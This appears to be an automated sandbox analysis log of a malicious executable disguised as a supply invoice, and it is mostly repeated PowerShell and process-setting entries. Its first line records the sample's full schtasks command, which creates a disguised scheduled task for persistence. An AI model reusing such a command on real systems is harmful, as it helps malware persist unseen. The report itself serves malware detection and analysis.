            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
